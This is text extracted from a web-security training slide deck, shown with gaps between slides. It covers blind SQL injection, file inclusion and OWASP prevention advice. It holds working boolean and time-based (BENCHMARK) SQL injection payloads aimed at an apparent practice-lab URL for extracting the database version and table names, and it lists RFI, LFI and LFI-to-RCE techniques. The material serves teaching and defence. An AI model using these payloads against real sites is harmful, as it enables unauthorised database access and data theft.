5. Blind SQL Injection
Normal Blind - Where you get TRUE/FALSE responses
based on output of SQL query. This is visible change
in page.
Totally Blind - No change in output for TRUE/FALSE
condition.
6. Normal Blind
Vulnerable URL:
http://site/vulnerabilities/sqli_blind/?id=1
TRUE Response:
http://site/vulnerabilities/sqli_blind/?id=1 AND 1=1
FALSE Response:
http://site/vulnerabilities/sqli_blind/?id=1 AND 1=2
Check Version:
FALSE Response
http://site/vulnerabilities/sqli_blind/?id=1 AND substring(version(),1,1)=4
TRUE Response
http://site/vulnerabilities/sqli_blind/?id=1 AND substring(version(),1,1)=5
7. Totally Blind
As this type didn't have any TRUE/FALSE responses, we need to use
time-based injection. Use IF() for condition and BENCHMARK() for
time delay.
Check Version:
FALSE Response
http://site/vulnerabilities/sqli_blind/?id=1 UNION SELECT
IF(SUBSTRING(version(),1,1)=4,BENCHMARK(5000000,MD 5(CHAR(1))),null),null
TRUE Response
http://site/vulnerabilities/sqli_blind/?id=1 UNION SELECT
IF(SUBSTRING(version(),1,1)=5,BENCHMARK(5000000,MD 5(CHAR(1))),null),null
Table name guessing:
http://site/vulnerabilities/sqli_blind/?id=1 UNION SELECT IF(SUBSTRING((select 1 from
users limit 0,1),1,1)=1,BENCHMARK(5000000,MD5(CHAR(1))),null), null
11. Mitigation/Prevention
Use of Prepared Statements (Parameterized Queries)
Use of Stored Procedures
Escaping all User Supplied Input
Least Privilege
White List Input Validation
https://www.owasp.org/index.php/SQL_Injection_Prev
ention_Cheat_Sheet
15. Mitigation/Prevention
Escape Before Inserting Untrusted Data into HTML
Context
Positive or “whitelist” input validation is also
recommended
Use HTTPOnly cookie flag
https://www.owasp.org/index.php/XSS_(Cross_Site_S
cripting)_Prevention_Cheat_Sheet
16. File Inclusion
Include PHP Shell (RFI)
Directory Traversal (LFI)
Read Code via PHP Stream Filters (PHP://filter)
Remote Code Execution (LFI to RCE)
Etc
33. Mitigation/Prevention
Ensure that user input is properly validated
Limit the use of dynamic inputs from users to
vulnerable functions
Build a whitelist for positive file names and code with
regular expressions (e.g. Alphanumeric only) or
arrays.
Do not try to blacklist for evil PHP code
34. Bug Hunting !!
Code Review
Scan for potential vulnerable functions
Traces back its parameter
Free Tool !! >> http://sourceforge.net/projects/rips-
scanner/